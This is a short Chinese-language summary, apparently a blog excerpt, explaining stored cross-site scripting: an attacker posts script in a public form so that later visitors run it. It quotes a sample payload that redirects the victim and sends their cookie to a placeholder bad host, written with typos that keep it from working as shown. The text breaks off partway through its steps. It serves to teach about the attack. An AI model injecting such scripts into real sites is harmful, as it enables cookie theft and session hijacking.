摘要:
1.在互联网中,一种非常常见的有效供给类型就是常说的恶意代码注入,如XSS,它的工作流程如下 a.恶意用户在一些公共区域(如建议提交表单或消息公告板的输入表单)输入一些文本,这些文本将被其他用户看到,但这些文本不仅仅是他们要输入的文本,同时还包含了一些可以在客户端执行的脚本,如下所示:<script> this.document="go.somewhere.bad?cookie="+this.coolie;</script>该脚本会使这个用户重定向,且最初站点的cookie信息将被随同发送 b.恶意用户提交这个表单并等待 c.系统的下一个用户看到了这 阅读全文